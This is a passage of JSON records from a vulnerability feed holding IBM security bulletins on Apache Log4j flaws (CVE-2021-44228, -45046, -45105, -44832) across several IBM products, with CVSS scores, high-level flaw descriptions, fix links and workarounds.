"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:47:35", "type": "ibm", "title": "Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:47:35", "id": "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "href": "https://www.ibm.com/support/pages/node/6552546", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nIBM Cognos Controller is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Controller has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF17 from Fix Central](<https://www.ibm.com/support/pages/node/6540652> \"Download IBM Cognos Controller 10.4.2 IF17 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\nRemediation for IBM Cognos Controller on Cloud has completed.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T20:04:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF17: Apache Log4j vulnerability (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T20:04:06", "id": "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "href": "https://www.ibm.com/support/pages/node/6540664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:34", "description": "## Summary\n\nIBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j as part of the logging functionality. These vulnerabilities have been addressed. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | common-transportmodule-12_0 up to and including common-transportmodule-33_2 \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | common-jnetcool-7_0 up to and including common-jnetcool-8_2 \n \n## Remediation/Fixes\n\nIBM strongly recommends fixing the vulnerabilities now by upgrading. \n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | [common-transportmodule-33_4](<https://www.ibm.com/support/pages/node/256461> \"common-transportmodule-33_4\" ) \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | [common-jnetcool-8_4](<https://www.ibm.com/support/pages/node/255019> \"common-jnetcool-8_4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T01:45:15", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T01:45:15", "id": "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "href": "https://www.ibm.com/support/pages/node/6551310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:26", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by the IBM Engineering Lifecycle Management products for logging . The fix includes upgrade to Apache log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM Engineering Lifecycle Management products (IBM Jazz Team Server based Applications) are affected: Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management (ETM), Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG).\n\nPlease find the affected components and remediations for each affected product and version in the table below. \n\n\n**Version(s)**| **Affected Product(s)**| **Remediation (Refer to the Step number in the Remediation Section) \n** \n---|---|--- \n6.0.6| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n6.0.6.1| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n7.0| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| | \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.1| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| #3| \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.2| Engineering Lifecycle Management (ELM)| | | #3| \nIBM Engineering Requirements Management DOORS Next(DNG)| #1| | | \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin. \n**\n\nNote: This Bulletin Supersedes Bulletin: <https://www.ibm.com/support/pages/node/6527732>\n\nNote: If you integrate any of the IBM Jazz Team Server-based products and versions (6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2) listed above with IBM WebSphere Application Server (WAS) you will want to review the IBM WebSphere Application Server (WAS) remediation [guidance](<https://www.ibm.com/support/pages/node/6538722> \"guidance\" ).\n\n1 - For **IBM Engineering Requirements Management DOORS Next (DNG)** Version 7.0.2 only. Click this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS+Next&release=7.0.2&platform=All&function=fixId&fixids=7.0.2-IBM-ELM-iFix010&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to install iFix010 or newer. Note, if you have prior installed the log4j patch patch_Log4Shell_DNv4.zip you will need to remove it first. Follow the instructions in the iFix for steps on how to remove patches.\n\n2 - The Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Requirements Management DOORS Next (DOORS Next), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management, Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG)** versions **6.0.6, 6.0.6.1,7.0, 7.0.1** will need to be updated. Follow this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-CLM-ELM&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Link\" ) and apply the Remediation\n\n3 - If the **Engineering Lifecycle Management (ELM)** optional component **mxbean-datacollection (ELMMon)** has been installed for version 7.0.1 or 7.0.2 it will need to be updated. Click This[ link ](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=All&platform=All&function=fixId&fixids=MXBean-DataCollection-V2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"link\" )and follow the instructions to remediate.\n\n4 - **IBM Jazz Reporting Service (JRS)** versions 6.0.6, 6.0.6.1 included an optional technology preview of the property graph solution (<https://jazz.net/pub/new-noteworthy/jrs/6.0.6/6.0.6/index.html#1>). This technology preview is impacted. The work around is to un-install both the Apache Cassandra - LQE Technology Preview and Elastic Search -LQE Technology Preview components of IBM Jazz Reporting Service. In IBM Installation Manager (IIM) modify packages to uninstall these components.\n\n## Workarounds and Mitigations\n\n[None](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&\\[%E2%80%A6\\]ion&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"None\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T19:58:40", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Management products are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T19:58:40", "id": "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "href": "https://www.ibm.com/support/pages/node/6540016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:03", "description": "## Summary\n\nIBM C\u00faram Social Program Management (SPM) uses the Apache Log4j libraries for SPM logging infrastructure. There are publicly known vulnerabilities for Apache Log4j which could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nC\u00faram SPM| 8.0.0.0 - 8.0.1.0 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n_Product_| _VRMF_| _Remediation_ \n---|---|--- \nC\u00faram SPM| \n\n8.0.1.0\n\n| \n\nVisit IBM Fix Central and upgrade to [8.0.1.0_iFix2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=8.0.1.0&platform=All&function=all> \"8.0.1.0_iFix2\" ) \n \n## Workarounds and Mitigations\n\nBased on current information, no IBM C\u00faram Social Program Management versions before V8 are impacted by the CVE-2021-44228 , CVE-2021-45046 , CVE-2021-44832 , CVE-2021-45105 vulnerabilities. Please refer to this [link](<https://www.ibm.com/support/pages/node/6526676> \"link\" ) for further information.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T10:51:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j may affect C\u00faram Social Program Management (CVE-2021-44832 , CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T10:51:11", "id": "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "href": "https://www.ibm.com/support/pages/node/6540904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:44", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Analytics has upgraded Apache Log4j to v2.16. This update also addresses CVE-2021-44228. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-45046 and CVE-2021-44228 have been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 